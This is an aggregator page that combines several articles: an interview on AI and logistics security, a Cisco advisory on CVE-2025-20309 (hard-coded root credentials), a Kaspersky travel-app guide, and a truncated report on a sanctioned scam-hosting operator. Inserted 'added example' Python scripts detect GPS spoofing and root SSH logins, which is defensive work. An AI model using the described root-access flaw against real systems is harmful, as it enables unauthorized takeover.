Cyber security aggregate rss news

Cyber security aggregator - feeds history


Features

In a world where your next-day delivery could hinge on lines of code and machine learning algorithms, logistics is no longer just about moving goods, it’s about moving data securely. The global supply chain has become both a marvel of AI-powered efficiency and a high-value target for cybercriminals. In 2024 alone, over 183,000 customers were affected by supply chain cyberattacks worldwide, a sharp contrast from the staggering 263 million impacted in 2019, yet still a sobering reminder that cyber threats are evolving, not disappearing. From counterfeiting to malware infections and drive-by compromises, the logistics sector has become a digital battlefield.

Meanwhile, AI’s footprint is growing fast: the cargo drone market alone is projected to hit $17.88 billion by 2030, fueled by AI’s promise of faster, smarter, and more autonomous delivery systems. But this raises a critical question: will AI drive the next wave of innovation in logistics, or open new doors for cyber threats to exploit?

To learn more about this evolving landscape, The Cyber Express sat down with Dhruvil Sanghvi, Founder and CEO of LogiNext, a global leader in AI-driven logistics automation. In this wide-ranging conversation, Sanghvi delves into emerging cyber risks, why automation must be built with security at its core, and how different regions are tackling the cybersecurity puzzle in their own unique ways.

The Rise of AI and the Growing Threat Landscape

With the rapid adoption of AI in logistics, one might assume that technology is the answer to most operational problems. However, Sanghvi offers a measured perspective.

"The more interconnected and intelligent supply chains become, the more vulnerable they are to attack vectors that exploit those very integrations," he says. "I see the highest risks in API vulnerabilities, unsecured IoT devices across fleet networks, and AI models being fed malicious or manipulated data. Threat actors no longer just target servers, they aim for the data pipelines and learning systems themselves."

Indeed, as companies push for seamless data flows, faster decision-making, and end-to-end visibility, every integration becomes a potential point of entry for cybercriminals.

Building Security into Automation

Automation is now table stakes in logistics.
From warehouse robotics to predictive route planning, the industry thrives on operational speed. But what happens when security takes a backseat?

"Efficiency and security aren't mutually exclusive, they must be engineered together," Sanghvi insists. "At LogiNext, we’ve built automation workflows that are permission-controlled and fully auditable. Automation without guardrails leads to incidents like the 2017 Maersk ransomware attack, which paralyzed global shipping. We believe automation should accelerate compliance, not bypass it."

This philosophy of "secure automation" is gradually being adopted across the logistics landscape. Companies are increasingly embedding cybersecurity principles into their DevOps pipelines, ensuring that automation doesn’t equate to exposure.

AI in Threat Detection: Early Radar, Not Autopilot

The cybersecurity community has been abuzz with the potential of AI to detect and mitigate threats before they escalate. But can AI be trusted as the first, and only, line of defense?

"AI is essential for real-time anomaly detection and predictive threat intelligence," says Sanghvi. "While traditional systems wait for a signature, AI can detect patterns and proactively raise red flags. That said, it’s not yet mature enough to act without human validation in high-stakes environments. We see AI as the early-warning radar; human judgment is still the command center."

AI's strength lies in its ability to parse enormous volumes of data and identify unusual behavior patterns that traditional tools often miss. But over-reliance without proper oversight could lead to false positives, or worse, missed attacks.

One Size Doesn’t Fit All

Operating across the US, UAE, and India, LogiNext has a global footprint, which gives Sanghvi a unique lens on how cybersecurity threats, and responses, differ across borders.

"In the US, the emphasis is on regulatory compliance: SOC2, ISO/IEC 27001, CCPA," he explains.
"In the UAE, there’s a stronger focus on infrastructure control and national security. In India, the challenge is scale: protecting millions of endpoints at low cost. Each region requires a tailored strategy, but one thing remains universal: ransomware doesn’t respect borders."

This underlines the importance of localized cyber strategies that account not just for the technological landscape, but also for regulatory frameworks and threat actor behaviors.

Data Protection in the Logistics Sector

“Data is the new oil” has become a truism in technology circles, but nowhere is it more evident than in logistics. Route data, customer information, delivery schedules, and warehouse analytics—all of it is prime target material.

"Encryption (in transit and at rest) is table stakes. Role-based access, frequent token refreshes, and audit logs are the next layers," Sanghvi explains. "At LogiNext, we also leverage anomaly detection algorithms that monitor abnormal location pings or route deviations."

These protocols have paid off. "Our platform has maintained a 99.96% uptime on web apps and a 99.67% crash-free rate on mobile—proof that stability and security can go hand in hand," he adds.

Business Continuity in the Face of Cyber Disruption

Cyberattacks on logistics firms don’t just affect one company, they ripple across industries. A delay in the delivery of semiconductors or medical supplies can have wide-reaching consequences.

"Redundancy across infrastructure, distributed data centers, and zero-trust frameworks are non-negotiable," says Sanghvi. "The 2025 Oracle Cloud’s security breach reminded the industry that centralized failures hurt everyone in the supply chain. At LogiNext, we’ve architected our systems for high availability across regions with real-time failover and backup strategies. We simulate attack scenarios regularly to pressure-test our preparedness."

The lesson is clear: resilience needs to be proactive, not reactive.
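The kind of check Sanghvi describes, monitoring location pings for abnormal movement and route deviations, in a minimal form as an added example that is not LogiNext's code: it flags an implausible speed between consecutive fixes, duplicate or out-of-order timestamps, and fixes that fall outside a corridor around the planned waypoints. The thresholds, the planned route and the sample pings are constructed assumptions.

```python
"""Telemetry sanity checks for fleet location pings.

Added example, not LogiNext's code. Flags three things a tampered or spoofed
GPS feed tends to produce: an implausible speed between consecutive fixes,
duplicate or out-of-order timestamps, and fixes outside a corridor around the
planned route. Thresholds, routes and pings below are constructed assumptions.
"""
import math
from dataclasses import dataclass
from typing import Dict, List, Tuple

EARTH_RADIUS_KM = 6371.0


def haversine_km(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance between two WGS84 points, in kilometres."""
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(phi1) * math.cos(phi2) * math.sin(dlam / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))


@dataclass(frozen=True)
class Ping:
    vehicle: str
    ts: int        # Unix seconds
    lat: float
    lon: float


def flag_pings(
    pings: List[Ping],
    planned: Dict[str, List[Tuple[float, float]]],
    max_kmh: float = 130.0,      # assumed ceiling for a road vehicle
    corridor_km: float = 2.0,    # assumed tolerance around planned waypoints
) -> List[str]:
    """Return human-readable alerts; an empty list means every ping looked plausible."""
    alerts: List[str] = []
    by_vehicle: Dict[str, List[Ping]] = {}
    for p in sorted(pings, key=lambda p: (p.vehicle, p.ts)):
        by_vehicle.setdefault(p.vehicle, []).append(p)

    for vehicle, seq in by_vehicle.items():
        # Speed between consecutive fixes: crossing a region in minutes is a spoofing tell.
        for prev, cur in zip(seq, seq[1:]):
            if cur.ts <= prev.ts:
                alerts.append(f"{vehicle}: duplicate or out-of-order timestamp at {cur.ts}")
                continue
            dist = haversine_km(prev.lat, prev.lon, cur.lat, cur.lon)
            speed = dist / ((cur.ts - prev.ts) / 3600)
            if speed > max_kmh:
                alerts.append(f"{vehicle}: implausible speed {speed:.0f} km/h between {prev.ts} and {cur.ts}")
        # Route deviation: distance from each fix to the nearest planned waypoint.
        route = planned.get(vehicle)
        if route:
            for p in seq:
                nearest = min(haversine_km(p.lat, p.lon, wlat, wlon) for wlat, wlon in route)
                if nearest > corridor_km:
                    alerts.append(f"{vehicle}: {nearest:.1f} km off planned route at {p.ts}")
    return alerts


# Constructed sample data: VAN-1 follows three waypoints and then jumps a degree of
# latitude in ten minutes; VAN-2 has no planned route and reports one timestamp twice.
PLANNED = {"VAN-1": [(40.00, -74.00), (40.10, -74.00), (40.20, -74.00)]}
SAMPLE_PINGS = [
    Ping("VAN-1", 0, 40.00, -74.00),
    Ping("VAN-1", 600, 40.10, -74.00),     # ~11 km in 10 min: fine
    Ping("VAN-1", 1200, 40.20, -74.00),
    Ping("VAN-1", 1800, 41.20, -74.00),    # ~111 km in 10 min and far off route: two alerts
    Ping("VAN-2", 0, 40.50, -74.50),
    Ping("VAN-2", 0, 40.50, -74.50),       # duplicate timestamp
    Ping("VAN-2", 600, 40.51, -74.50),
]

if __name__ == "__main__":
    for alert in flag_pings(SAMPLE_PINGS, PLANNED):
        print(alert)
```

Run stand-alone it reports three alerts for the constructed data: a 667 km/h jump, the same ping far off the planned route, and a duplicated timestamp. In production the thresholds would come from the vehicle class, and the corridor test should measure distance to the route segments rather than to the waypoints alone.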
Cybersecurity and Startups: Still an Afterthought?

As an investor and mentor to several tech startups, Sanghvi has seen how early-stage companies often neglect cybersecurity.

"Unfortunately, many still see it as a Series B problem rather than a seed-stage priority. Founders must internalize that every line of code is a potential vulnerability," he warns. "The best teams I’ve worked with are the ones who integrate security reviews into CI/CD and think about threat modeling even before launch."

The shift toward “security-first startups” is slow but vital, especially as more tech disruptors enter sensitive sectors like logistics, healthcare, and finance.

Closing the Gap Between Innovation and Enforcement

Is the regulatory environment keeping pace with the rapid innovation in AI and logistics tech?

"Regulations are catching up, but innovation still outpaces enforcement," Sanghvi observes. "What’s encouraging is the global shift toward data localization and mandatory breach disclosures. However, unless regulators work more closely with tech providers on standards, as aviation does with aircraft safety, we’ll always be reacting to the last breach, not preventing the next."

It's a call for collaborative regulation, where lawmakers and technologists co-design frameworks that anticipate risk rather than just respond to it.

The Blind Spot in Cyber Strategies

When asked about the most common mistake startups make, Sanghvi doesn't hesitate: "They underestimate insider threats and over-focus on perimeter security. Access logs, permission hygiene, and behavioral monitoring are often ignored. And when startups do get breached, they lack a clear incident response plan, making recovery slower and costlier."

Organizations must broaden their threat models to account not just for outside hackers, but also for internal actors with privileged access.
Best Practices from Around the World

Having worked across continents, Sanghvi believes that some regions have lessons to offer others.

"The US culture of ‘security by design’ needs to be adopted more broadly. In India and the UAE, security is often retrofitted. Starting from secure architecture rather than patching it later makes systems more resilient. That mindset shift alone could prevent a significant chunk of vulnerabilities."

Security as a Foundation, Not a Feature

When asked about his "aha" moment regarding cybersecurity, Sanghvi’s answer is revealing.

"Honestly, we never had an 'aha' moment. Security has always been a core principle at LogiNext since day one. In logistics, where systems are deeply interconnected and operate in real time, we’ve always believed that even a minor breach can have outsized consequences."

He adds, "High-profile incidents like the 2025 BlueYonder outage have only reinforced our conviction. Watching companies suffer ripple effects across industries due to avoidable security lapses validates the path we’ve taken, building with security as a foundation, not an afterthought."

Autonomous AI Agents

Outside of corporate strategy, what tech is Dhruvil personally excited about? His answer reflects both enthusiasm and vision.

"I’m deeply excited about the rise of autonomous AI agents, especially their potential in operationalizing complex workflows without human intervention," he says. "Tools like AutoGPT, Devin, and emerging enterprise-grade agents are redefining how we think about task delegation."

He continues, "Imagine a logistics coordinator that never sleeps, learns from every delivery exception, and autonomously re-optimizes routes in real time across cities. That’s no longer science fiction."

Conclusion

The integration of AI in logistics is no longer a futuristic concept, it’s today’s reality. From autonomous drones to real-time tracking, AI is powering an industry that once ran on paper trails and manual schedules. But as the sector races toward automation, it must also confront an uncomfortable truth: innovation is outpacing security.

In 2023 alone, the FBI logged nearly 300,000 phishing incidents in the U.S., while tools like WormGPT have emerged as dark web alternatives capable of crafting highly convincing, malicious content. In logistics, these technologies pose real risks, not just to backend systems but to the very customers companies aim to serve. The ability of drones to record and transmit footage wirelessly, for instance, introduces new surveillance risks that few have begun to address seriously.

And the issue isn’t just about breaches or bots. It’s also about trust and experience. In the U.S., more than 40% of consumers reported dissatisfaction when interacting with AI-powered customer service tools. This suggests that while AI can mimic conversation, it hasn’t mastered context or empathy, both essential in high-pressure logistics scenarios where every delayed shipment or rerouted package can trigger a ripple effect.

To its credit, the industry isn’t standing still. We are beginning to see more holistic strategies, including threat modeling for AI systems, real-time anomaly detection, and regulatory frameworks aimed at closing the security gap. But these responses still feel fragmented and reactive. For a sector that operates 24/7 and spans continents, that’s not good enough.

As Dhruvil Sanghvi aptly pointed out, cybersecurity in logistics can’t be an afterthought. It needs to be designed into the system, not duct-taped on after a breach. And that mindset shift has to happen now, not when the next high-profile attack makes headlines.

AI will undoubtedly remain central to the future of logistics. But the question isn't just what it can do—it's how safely it can do it. Because when automation fails, it’s not just code that crashes—it’s confidence, continuity, and sometimes even commerce.

In the race toward a smarter supply chain, speed and security must run side by side. Anything less is a risk the industry can’t afford.


Firewall Daily

Cisco has issued a new security advisory addressing a severe vulnerability in its Unified Communications Manager (Unified CM) and Unified Communications Manager Session Management Edition (Unified CM SME). The flaw, now identified as CVE-2025-20309, carries the highest possible CVSS score of 10.0. This Cisco vulnerability stems from static root account credentials embedded during the development phase, which were never removed or secured prior to product release. According to Cisco's advisory, the root credentials are immutable, meaning administrators cannot change or delete them, leaving the systems vulnerable to unauthenticated, remote attackers.

“This vulnerability is due to the presence of static user credentials for the root account that are reserved for use during development,” the advisory noted.

How the CVE-2025-20309 Vulnerability Works

An attacker could leverage CVE-2025-20309 to remotely log in as the root user without any authentication. Once inside, they gain unrestricted access, allowing them to execute arbitrary commands with full system privileges. The threat applies regardless of device configuration if the affected software version is in use.

The flaw was identified during internal security testing and not through a public exploit, and Cisco’s Product Security Incident Response Team (PSIRT) has stated that, as of the advisory release, there is no evidence of active exploitation in the wild.

Affected Versions and Patch Details

The issue affects specific Engineering Special (ES) releases of Unified CM and Unified CM SME:

Versions 15.0.1.13010-1 through 15.0.1.13017-1 are confirmed vulnerable.
Only these ES releases, which are distributed through Cisco’s Technical Assistance Center (TAC), are impacted.
Cisco versions 12.5 and 14 are not affected by this vulnerability.
The first fixed release is 15SU3, available in July 2025; alternatively, users may apply the patch file ciscocm.CSCwp27755_D0247-1.cop.sha512.

Cisco has not provided any workarounds, urging users to apply the patch or upgrade to the secure version immediately. The advisory clearly states that there are no mitigations other than upgrading.
Conclusion

The CVE-2025-20309 Cisco vulnerability highlights the serious security risks of leaving development-stage credentials in production environments. With no available workaround and the potential for attackers to gain full root access, Cisco strongly advises all users of Unified CM and Unified CM SME to apply the latest updates without delay.

Organizations should promptly verify their software versions, review SSH logs for signs of unauthorized root access, and upgrade to version 15SU3 or the appropriate patch. While no active exploitation has been reported, the critical nature and ease of exploitation make this vulnerability an urgent priority for IT and security teams across all sectors relying on Cisco’s communication systems.
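A triage script for the verification step just described, added here as an example and not Cisco tooling: it encodes the affected ES build range and the patch file name from the advisory, parses the installed version string for an ordered comparison, and scans SSH authentication log lines for successful root logins. The OpenSSH-style log format and the sample lines are constructed assumptions; whether an installed COP changes the reported version string is not stated on the page, so the check simply treats a listed patch file name as applied.

```python
"""Triage helpers for CVE-2025-20309 on Cisco Unified CM / Unified CM SME.

Added example, not Cisco tooling. The version range and patch file name come
from the advisory text; the SSH log format (OpenSSH-style "Accepted <method>
for root from <ip> port <n>") and the sample log lines are constructed
assumptions that should be adapted to what the appliance actually emits.
"""
import re
from typing import Dict, Iterable, List, Tuple

AFFECTED_MIN = "15.0.1.13010-1"   # first vulnerable ES build (advisory)
AFFECTED_MAX = "15.0.1.13017-1"   # last vulnerable ES build (advisory)
PATCH_COP = "ciscocm.CSCwp27755_D0247-1.cop.sha512"  # patch file (advisory)

_VERSION_RE = re.compile(r"(\d+(?:\.\d+)*)(?:-(\d+))?")


def parse_version(text: str) -> Tuple[int, ...]:
    """'15.0.1.13010-1' -> (15, 0, 1, 13010, 1); a missing '-N' suffix counts as 0.

    Tuples compare element-wise, so a shorter string such as '12.5' becomes
    (12, 5, 0) and sorts below every 15.x build.
    """
    m = _VERSION_RE.fullmatch(text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(p) for p in m.group(1).split(".")) + (int(m.group(2) or 0),)


def is_affected(version: str, installed_cops: Iterable[str] = ()) -> bool:
    """True when the build is inside the vulnerable ES range and the patch COP is absent."""
    v = parse_version(version)
    in_range = parse_version(AFFECTED_MIN) <= v <= parse_version(AFFECTED_MAX)
    return in_range and PATCH_COP not in set(installed_cops)


# Successful root SSH login, OpenSSH style (assumed format).
_ROOT_LOGIN_RE = re.compile(r"Accepted \S+ for root from (?P<ip>[0-9a-fA-F.:]+) port \d+")


def root_logins(log_lines: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (log prefix up to the hostname, source IP) for each successful root login."""
    hits = []
    for line in log_lines:
        m = _ROOT_LOGIN_RE.search(line)
        if m:
            prefix = line.split(" sshd", 1)[0]
            hits.append((prefix, m.group("ip")))
    return hits


def triage(version: str, log_lines: Iterable[str], installed_cops: Iterable[str] = ()) -> Dict[str, object]:
    """Combine both checks; a root login on an affected build is what needs investigating."""
    affected = is_affected(version, installed_cops)
    logins = root_logins(log_lines)
    return {
        "version": version,
        "affected": affected,
        "root_logins": logins,
        "needs_investigation": affected and bool(logins),
    }


# Constructed sample: an admin login, a failed root attempt, a successful root login
# from an external address, and a root login from an internal address.
SAMPLE_LOG = [
    "Jul  2 10:14:03 cucm sshd[2231]: Accepted password for admin from 10.0.0.7 port 50122 ssh2",
    "Jul  2 10:15:47 cucm sshd[2290]: Failed password for root from 198.51.100.23 port 41002 ssh2",
    "Jul  2 10:15:51 cucm sshd[2290]: Accepted password for root from 198.51.100.23 port 41002 ssh2",
    "Jul  2 11:02:10 cucm sshd[2410]: Accepted publickey for root from 10.0.0.9 port 50200 ssh2",
]

if __name__ == "__main__":
    print(triage("15.0.1.13012-1", SAMPLE_LOG))
```

Any successful root login on an affected build is worth a ticket regardless of source address, since the advisory describes the credentials as static and unchangeable; the external-address hit in the sample is simply the more urgent of the two.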


Tips

Summer is in full swing, and that means one thing — it’s time to travel! Remember how people used to prepare for trips? Buying pocket guidebooks and phrasebooks, bombarding all our well-traveled friends with questions: What should I see? How much do tours cost? And how do I get a SIM card? These days, the world has changed. You can plan a comfortable trip while lounging on your sofa with a smartphone in hand — or even while waiting at the airport gate. All you need to do is download the right apps.

In this guide, we’ll help you prep both yourself and your phone for your journey:

How to find your bearings in a new place?
How to stay connected?
How to get around comfortably?
How to enjoy the city like a local?
How to find good food?
How to travel safely?

How to find your bearings in a new place?

Sure, you could buy a paper map in advance, but it’s much easier to download a few mapping apps. Yes, a few — don’t rely on just one.

Google Maps. An absolute must-have for any traveler. Plan routes and find nearby hotels, cafes, currency exchanges, and attractions. Read folks’ reviews for insider knowledge on the best spots (and the ones to avoid). Google Maps is every traveler’s digital Swiss Army knife — useful for a ton of different things (as long as you’ve downloaded offline maps in advance or have an internet connection).

Organic Maps. If you’re going somewhere beyond the reach of mobile networks, offline maps are your best bet. You can download a detailed map of your destination before your trip. It includes everything you’d find in Google Maps — restaurants, shops, transport stops — just without user ratings and reviews. One standout feature is route planning for walking, biking, and hiking. You can even switch to a topographic view to see elevation changes — great for mountainous terrain or outdoor adventures.

Guru Maps. Among tourists, this app is known as the king of navigation — and for good reason. With Guru Maps you can venture far off the grid without getting lost. It’s made for finding hiking trails, routes through the wilderness, even swamp-trekking — perfect for when Google Maps and Organic Maps find no route at all. Like the other two, Guru Maps is free to use, but there’s also a paid Pro version.
This lets you download unlimited maps and create enough pins and GPS tracks for even the most hardcore traveler.

How to stay connected?

Offline apps are great, but pre-downloaded information alone isn’t always enough. Especially in big cities, it’s essential to stay online. There are a few ways to do this.

eSIM. Get a local SIM card, or better yet, an eSIM. You can use the Kaspersky eSIM Store app to find and activate affordable local data plans — no roaming fees or plastic SIM cards needed. It’s simple: install Kaspersky eSIM Store, choose your destination, and buy a data plan that suits your needs. Along with the data package, you’ll receive your free eSIM — simply install it in your device in a couple of clicks. Later you can top up your eSIM for the same or different destinations with more great plans from local operators. And you’re not limited to just one country at a time — if you’re traveling across several countries, choose a regional plan or even get global coverage in 122 countries for constant connection.

eSIMs from Kaspersky eSIM Store don’t include a phone number — they only support data transfer. But your regular SIM stays in your device, so you can still receive texts and calls. Of course, you don’t need to answer roaming calls — but you can see who contacted you and respond via messenger using your eSIM data. The cool thing is that you can set up eSIMs in advance, including the date your data plan will activate. Kaspersky eSIM Store offers both expiring plans (valid for 30 days in most countries) and non-expiring ones where unused gigabytes are saved for your next trip. eSIMs and related services are provided by our tech partner BNESIM Limited. For more on all the benefits of eSIMs, check out our blog post: Internet on the go with Kaspersky eSIM Store.

Mobile operator app. If you still plan to use roaming from your usual operator, be sure to install their app to monitor your data use, enable roaming options, and top up.
However, there’s a downside here: roaming usually costs much more than using an eSIM from Kaspersky eSIM Store. Yes, some providers offer special plans like unlimited messaging or map access, but relying on them could backfire in a crucial moment. For example, what if you’re in a small town where Google Maps timetables for public transportation aren’t up to date? You’ll need to look for an alternative transport app or take a completely different route. That could mean using a search engine — which can be painfully expensive on roaming data.

How to get around comfortably?

This is where specialized apps come to the rescue — reliable in big cities and helpful even in small towns where you could otherwise get stuck.

Moovit. An app to help you navigate public transport almost anywhere in the world. It sources real-time data from transport providers — including private companies — so seasoned travelers trust Moovit in cities with a well-developed public transit system. But don’t expect it to tell you exactly when a local bus is going to arrive in a tiny remote village. In such cases, it’s best to rely on taxis.

Uber. If you’ve ever taken a taxi, there’s a good chance you already have Uber on your phone. It’s one of the world’s biggest ride-hailing platforms: just enter your destination, choose a rate, and wait for your driver. Simple and intuitive — but there’s a catch: Uber isn’t available everywhere. You’ll have no trouble getting a ride in North America, Europe, and parts of Asia, but elsewhere your best bet is often a local taxi app.

Yandex Go. Great for rides in Russia, Georgia, Kazakhstan, Belarus, Moldova, Armenia, Kyrgyzstan, Lithuania, Serbia, and Uzbekistan.

DiDi. Use this app in China, Argentina, Australia, Brazil, Chile, Colombia, Costa Rica, Ecuador, Egypt, Japan, Mexico, New Zealand, Panama, Peru, and the Dominican Republic.

Grab. The go-to ride-hailing app for Southeast Asia: Singapore, Cambodia, Myanmar, Malaysia, the Philippines, Thailand, Vietnam, and Indonesia.
Careem. Ideal for travel in Egypt, Bahrain, Iraq, Jordan, Pakistan, Saudi Arabia, Kuwait, Morocco, and the UAE.

Bonus: InDrive is a unique app that lets you name your price for a ride and choose a driver. Available in 48 countries.

How to enjoy a city like a local?

Sometimes you only have a few hours or a couple of days to explore a huge city. So how do you quickly decide what to see and where to go? Previously, you could find such answers on Foursquare — but what now?

Visit a City. According to its developers, this app covers more than 3000 cities worldwide. Choose free mini-guides, buy tickets to museums and attractions, or book tours. With just a few clicks, you can plan a trip — say, two days in Istanbul — and get a detailed itinerary down to the minute. Many major cities now offer their own travel apps — so check those out too. For a Thames-side stroll, try Visit London; if it’s mosques and markets you’re after, check Istanbul Tourist Pass; and if you’ve always dreamed of seeing Park Güell, use Hola Barcelona.

ChatGPT. Yes, artificial intelligence can help here too, creating an itinerary for any city on Earth and offering it in a neat PDF or spreadsheet. Just bear in mind that AI can’t always account for real-world factors like traffic or opening hours — things that are kept up to date by real people in specialized apps like Visit a City. But for general plans, ChatGPT works wonderfully. Just tell it something like: “Plan a 2-day trip to Istanbul for two people in their 30s. The pace should be relaxed and must include Galata Tower, a San Sebastián cheesecake stop, and a Bosphorus cruise. Break it down by time, considering traffic.”

How to find good food?

If you’re just looking for a quick bite while exploring, Google Maps or any other map app will do the trick — as long as you’ve got an internet connection, you’ll see nearby food options in seconds. But if you’re after something more authentic or sophisticated, there are dedicated apps for that.

The MICHELIN Guide.
Not sure where to eat and want a guaranteed good spot? Pick any restaurant in this guide — and you can even book a table right in the app. A common myth is that Michelin is only for expensive fine dining, but that’s not true anymore: today the guide includes plenty of local gems with reasonable prices and great service. So whether you’re a foodie or just want a reliable recommendation, the MICHELIN Guide has something for every budget.

TheFork. This popular app makes sure no tourist goes hungry — at least in Europe. It’s packed with everything you need: addresses, menus, cuisine types, food photos, average prices, real reviews, and the ability to book a table directly. Sounds ideal, but as usual there’s a catch: TheFork only works in certain major European cities — for now: Paris, Amsterdam, Barcelona, Lisbon, Madrid, Milan, Rome, Geneva, Brussels, Stockholm, Marseille, and Bordeaux.

Local apps. Just like with taxis, every country — or even every city — tends to have its own version of TheFork. So it’s worth doing a little research to see what app is popular at your destination. For example, in the United States, you’ll want Resy and Yelp, while in China, Dianping is the go-to (if your Chinese is OK: it’s only available in Chinese).

Bonus: Flush Toilet Finder. This handy app helps you locate public toilets all over the world — a perfect companion to your restaurant guide. While general maps might also show toilet locations, Flush Toilet Finder provides extra details such as wheelchair accessibility, whether access codes or keys are required, and how much it costs.

How to travel safely?

Connecting to the first open Wi-Fi spot you find is not a great idea — and neither is storing a passport scan in your photo gallery. Here’s how to add a dash of digital safety to your perfect trip mix:

Obsidian. You’ll probably want to plan your trip in advance — and most likely, you’ll try to do so using the standard Notes app on your phone.
That’s not the safest option, and sometimes not the most convenient either when it comes to storing important information. Consider Obsidian — it protects your notes with end-to-end encryption and syncs them across your devices. But there are other similar apps out there, which we wrote about in our article Keep it under wraps: encrypted note-taking apps and to-do lists.

Kaspersky Password Manager. Store photos or PDFs of your passports, tickets, vouchers, and other important documents in secure storage — they can only be decrypted and viewed after entering a main password that only you know. At the same time, you can easily add or open any document on any device — the app is cross-platform and constantly syncs information between your smartphone and computer. In addition, our password manager can store two-factor authentication tokens. Remember that traditional one-time passwords may not arrive via SMS while roaming, or they may be severely delayed. Take a couple of minutes at home to configure your frequently used apps and websites so that 2FA codes are generated in Kaspersky Password Manager instead of being sent via SMS.

Kaspersky VPN Secure Connection. If you’ll be connecting to unfamiliar Wi-Fi networks often during your trip, your best bet is to protect your connection. You can do this with the help of one of the fastest VPNs in the world. Plus, the VPN also lets you change your phone’s location in advance — so your search results become local! That way, even from home, you can plan visits to the events that locals actually go to, not just tourist traps.

Wherever you’re going, remember — happiness is only real when shared. Stay connected with Kaspersky eSIM Store and share your favorite travel moments with your loved ones.

What else to read before your trip:

How to travel safely
Internet on the go with Kaspersky eSIM Store
Fake Wi-Fi on board a flight
Going on vacation? Beware of scammers
Four ways to find spy cameras


A Little Sunshine

In May 2025, the U.S. government sanctioned a Chinese national for operating a cloud provider linked to the majority of virtual currency investment scam websites reported to the FBI. But a new report finds the accused continues to operate a slew of established accounts at American tech companies — including Facebook, GitHub, PayPal and Twitter/X.

On May 29, the U.S. Department of the Treasury announced economic sanctions against Funnull Technology Inc., a Philippines-based company alleged to provide infrastructure for hundreds of thousands of websites involved in virtual currency investment scams known as “pig butchering.” In January 2025, KrebsOnSecurity detailed how Funnull was designed as a content delivery network that catered to foreign cybercriminals seeking to route their traffic through U.S.-based cloud providers.

The Treasury also sanctioned Funnull’s alleged operator, a 40-year-old Chinese national named Liu “Steve” Lizhi. The government says Funnull directly facilitated financial schemes resulting in more than $200 million in financial losses by Americans, and that the company’s operations were linked to the majority of pig butchering scams reported to the FBI.

It is generally illegal for U.S. companies or individuals to transact with people sanctioned by the Treasury. However, as Mr. Lizhi’s case makes clear, just because someone is sanctioned doesn’t necessarily mean big tech companies are going to suspend their online accounts.

The government says Lizhi was born November 13, 1984, and used the nicknames “XXL4” and “Nice Lizhi.” Nevertheless, Steve Liu’s 17-year-old account on LinkedIn (in the name “Liulizhi”) had hundreds of followers (Lizhi’s LinkedIn profile helpfully confirms his birthday) until quite recently: The account was deleted this morning, just hours after KrebsOnSecurity sought comment from LinkedIn.

Mr. Lizhi’s LinkedIn account was suspended sometime in the last 24 hours, after KrebsOnSecurity sought comment from LinkedIn.

In an emailed response, a LinkedIn spokesperson said the company’s “Prohibited countries policy” states that LinkedIn “does not sell, license, support or otherwise make available its Premium accounts or other paid products and services to individuals and companies sanctioned by the U.S.
government.” LinkedIn declined to say whether the profile in question was a premium or free account.

Mr. Lizhi also maintains a working PayPal account under the name Liu Lizhi and username “@nicelizhi,” another nickname listed in the Treasury sanctions. PayPal did not respond to a request for comment.

A 15-year-old Twitter/X account named “Lizhi” that links to Mr. Lizhi’s personal domain remains active, although it has few followers and hasn’t posted in years.

These accounts and many others were flagged by the security firm Silent Push, which has been tracking Funnull’s operations for the past year and calling out U.S. cloud providers like Amazon and Microsoft for failing to more quickly sever ties with the company.

Liu Lizhi’s PayPal account.

In a report released today, Silent Push found Lizhi still operates numerous Facebook accounts and groups, including a private Facebook account under the name Liu Lizhi. Another Facebook account clearly connected to Lizhi is a tourism page for Ganzhou, China called “EnjoyGanzhou” that was named in the Treasury Department sanctions.

“This guy is the technical administrator for the infrastructure that is hosting a majority of scams targeting people in the United States, and hundreds of millions have been lost based on the websites he’s been hosting,” said Zach Edwards, senior threat researcher at Silent Push. “It’s crazy that the vast majority of big tech companies haven’t done anything to cut ties with this guy.”

The FBI says it received nearly 150,000 complaints last year involving digital assets and $9.3 billion in losses — a 66 percent increase from the previous year. Investment scams were the top crypto-related crimes reported, with $5.8 billion in losses.

In a statement, a Meta spokesperson said the company continuously takes steps to meet its legal obligations, but that sanctions laws are complex and varied.
They explained that sanctions are often targeted in nature and don’t always prohibit people from having a presence on its platform. Nevertheless, Meta confirmed it had removed the account, unpublished Pages, and removed Groups and events associated with the user for violating its policies.

Attempts to reach Mr. Lizhi via his primary email addresses at Hotmail and Gmail bounced as undeliverable. Likewise, his 14-year-old YouTube channel appears to have been taken down recently.

However, anyone interested in viewing or using Mr. Lizhi’s 146 computer code repositories will have no problem finding GitHub accounts for him, including one registered under the NiceLizhi and XXL4 nicknames mentioned in the Treasury sanctions.

One of multiple GitHub profiles used by Liu “Steve” Lizhi, who uses the nickname XXL4 (a moniker listed in the Treasury sanctions for Mr. Lizhi).

Mr. Lizhi also operates a GitHub page for an open source e-commerce platform called NexaMerchant, which advertises itself as a payment gateway working with numerous American financial institutions. Interestingly, this profile’s “followers” page shows several other accounts that appear to be Mr. Lizhi’s. All of the account’s followers are tagged as “suspended,” even though that suspended message does not display when one visits those individual profiles.

In response to questions, GitHub said it has a process in place to identify when users and customers are Specially Designated Nationals or other denied or blocked parties, but that it locks those accounts instead of removing them. According to its policy, GitHub takes care that users and customers aren’t impacted beyond what is required by law.

All of the follower accounts for the XXL4 GitHub account appear to be Mr. Lizhi’s, and have been suspended by GitHub, but their code is still accessible.
“This includes keeping public repositories, including those for open source projects, available and accessible to support personal communications involving developers in sanctioned regions,” the policy states. “This also means GitHub will advocate for developers in sanctioned regions to enjoy greater access to the platform and full access to the global open source community.”

Edwards said it’s great that GitHub has a process for handling sanctioned accounts, but that the process doesn’t seem to communicate risk in a transparent way, noting that the only indicator on the locked accounts is the message, “This repository has been archived by the owner. It is now read-only.”

“It’s an odd message that doesn’t communicate, ‘This is a sanctioned entity, don’t fork this code or use it in a production environment’,” Edwards said.

Mark Rasch is a former federal cybercrime prosecutor who now serves as counsel for the New York City-based security consulting firm Unit 221B. Rasch said when Treasury’s Office of Foreign Assets Control (OFAC) sanctions a person or entity, it then becomes illegal for businesses or organizations to transact with the sanctioned party.

